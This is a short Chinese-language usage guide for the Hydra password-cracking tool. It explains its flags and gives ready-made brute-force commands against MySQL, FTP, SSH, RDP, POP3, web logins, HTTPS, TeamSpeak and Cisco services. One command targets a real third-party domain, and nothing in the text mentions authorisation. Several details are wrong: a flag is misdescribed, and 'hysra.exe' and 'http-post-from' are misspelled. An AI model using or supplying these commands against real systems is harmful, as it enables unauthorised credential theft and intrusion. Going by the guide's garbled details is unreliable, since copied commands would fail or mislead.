参数详解:
-m 指定目标列表文件一行一条
-f 破解出来一个密码之后就停止
-R 继续上一次的进程进行破解
-S 使用SSL协议连接
-s PORT 指定端口,如果非默认端口可以这个参数指定
-l LOGIN 指定用户名
-L PASS 指定指定用户名字典(文件),比较少用,一般使用密码字典
-P FILE 指定的密码字典(文件)
-e ns 空密码探测(n),指定的用户密码探测(s)
-C FILE 用户名可以用:分割(username:password)可以代替-l username -p password
-o FILE 指定结果输出文件
-t TASKS 指定多线程数量,默认为16个线程
-v/-V 显示详细过程
server 目标IP
service 指定要破解的内容(如:telnet ftp pop3 mssql mysql ssh ssh2......)
1、破解mysql密码
hydra.exe -L C:111.txt -P C:222.txt 192.168.0.0 mysql
使用-L指定我们需要的用户名文件,-P指定字典
2、破解ftp
hydra.exe -l admin -P C:222.txt -t 5 192.168.0.0 ftp
使用-l指定用户名,-t指定线程数,-P指定密码字典
3、破解ssh
hysra.exe -L C:111.txt -P C:222.txt -e n -t 5 -vV 192.168.1.1 ssh
使用-e n对空密码探测
4、破解rdp
hydra.exe -l administrator -P C:222.txt www.xxx.com rdp -V
破解www.xxx.com的rdp服务,远程桌面协议
5、破解pop3
hydra.exe -l root -P C:222.txt baidu.com pop3
6、get方式提交,破解web登录
hydra.exe -l admin -P C:222.txt -vV -e ns IP http-get /admin/
hydra.exe -l admin -P C:222.txt -vV -e ns -f IP http-get /admin/index
用-f,破解出来一个密码之后就停止,IP是目标ip,get方式
7、post方式提交,破解web登录
hydra.exe -l admin -P C:222.txt -vV -e ns -f IP http-post-from
8、破解https
hydra.exe -m /index.php -l admin -P C:222.txt IP https
9、破解teamspeak
hydra.exe -l admin -P C:222.txt -s 端口 -vV IP teamspeak
10、破解cisco
hydra.exe -P C:222.txt cisco
有很多的服务此工具都可以破解,拥有强大的字典,加上知道你过的参数就能很好的完成。
hydra [[[-l LOGIN|-L FILE] [-p PASS|-P FILE]] | [-C FILE]] [-e nsr] [-o FILE] [-t TASKS] [-M FILE [-T TASKS]] [-w TIME] [-W TIME] [-f] [-s PORT] [-x MIN:MAX:CHARSET] [-SuvV46] [service://server[:PORT][/OPT]]
支持的服务和协议:telnet ftp pop3[-ntlm] imap[-ntlm] smb smbnt http[s]-{head|get} http-{get|post}-form http-proxy cisco cisco-enable vnc ldap2 ldap3 mssql mysql oracle-listener postgres nntp socks5 rexec rlogin pcnfs snmp rsh cvs svn icq sapr3 ssh2 smtp-auth[-ntlm] pcanywhere teamspeak sip vmauthd firebird ncp afp等等